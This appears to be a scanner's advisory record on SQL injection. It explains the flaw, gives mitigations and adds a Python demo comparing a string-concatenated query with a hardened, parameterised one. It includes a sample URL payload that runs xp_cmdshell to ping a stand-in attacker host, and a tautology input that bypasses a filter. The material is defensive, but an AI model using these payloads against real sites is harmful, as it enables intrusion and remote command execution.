VID: 22052
Severity: 40
Port: 80, ...
Protocol: TCP
Class: WWW
Detailed Description |
The specified web page on the web server is vulnerable to SQL injection attacks. The web page does not properly validate user input before passing it to an SQL query. Therefore, an attacker could create their own SQL commands and submit them to the database connected to the web server through these input fields, giving them the ability to read, modify, create and delete database entries. Being able to inject SQL commands usually means that an attacker can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. The attacker can use stored procedures such as master..xp_cmdshell to perform remote execution:
http://[www.target.com]/vulnerable.asp?id=10'; exec master..xp_cmdshell 'ping www.attacker.com'--
* References:
  - http://www.unixwiz.net/techtips/sql-injection.html
  - http://www.tech-faq.com/sql-injection-attack.shtml
  - http://www.cgisecurity.com/development/sql.shtml
  - http://www.securitydocs.com/library/2656
  - http://www.securitydocs.com/library/3348
  - http://www.securitydocs.com/library/3587
  - http://www.securiteam.com/securityreviews/5DP0N1P76E.html
  - http://www.iss.net/security_center/static/8783.php
  - http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
* Platforms Affected: any HTTP server (any version), any operating system (any version)
Recommendation
o Filter out characters such as single quote, double quote, slash, backslash and semicolon, and extended characters such as NULL, carriage return, new line, etc., in all strings coming from: - input from users - parameters from the URL - values from cookies
o For numeric values, convert the value to an integer before placing it in the SQL statement, or use ISNUMERIC to make sure it is an integer.
o Change the "Startup and run SQL Server" account to a low-privilege user in the SQL Server Security tab.
o Delete stored procedures that you are not using, such as:
master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
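As an added example (not part of this record or of any scanner's own code), the string-built lookup the record describes is shown beside a lookup that applies the second recommendation, converting the numeric parameter to an integer before any SQL is built. The in-memory SQLite table, its `secret` column and the tautology input are constructed for the demonstration; binding the converted value as a query parameter is an extra step beyond the record's own text.

```python
import sqlite3

# Constructed sample table standing in for the web application's database.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, secret INTEGER);
INSERT INTO items VALUES (10, 'public item', 0), (11, 'hidden item', 1);
""")


def lookup_vulnerable(raw_id):
    """Builds the query by string concatenation, as the vulnerable page does.

    Whatever arrives in the 'id' parameter becomes part of the SQL text, so a
    crafted value can change the query's logic (here: bypass 'secret = 0').
    """
    sql = "SELECT name FROM items WHERE id = " + raw_id + " AND secret = 0"
    return [row[0] for row in _conn.execute(sql)]


def lookup_hardened(raw_id):
    """Recommendation: convert the numeric parameter to an integer first.

    Quotes, semicolons, comment markers and SQL keywords are not part of a
    valid integer, so int() rejects them before any SQL exists. The converted
    value is then bound as a parameter rather than concatenated.
    Returns None when the input is rejected.
    """
    try:
        item_id = int(raw_id.strip())
    except ValueError:
        return None  # reject the request; the caller returns an error page
    sql = "SELECT name FROM items WHERE id = ? AND secret = 0"
    return [row[0] for row in _conn.execute(sql, (item_id,))]


if __name__ == "__main__":
    print(lookup_vulnerable("10"))             # ['public item']
    print(lookup_vulnerable("10 OR 1=1 --"))   # both rows: filter bypassed
    print(lookup_hardened("10 OR 1=1 --"))     # None: rejected
    print(lookup_hardened("10"))               # ['public item']
```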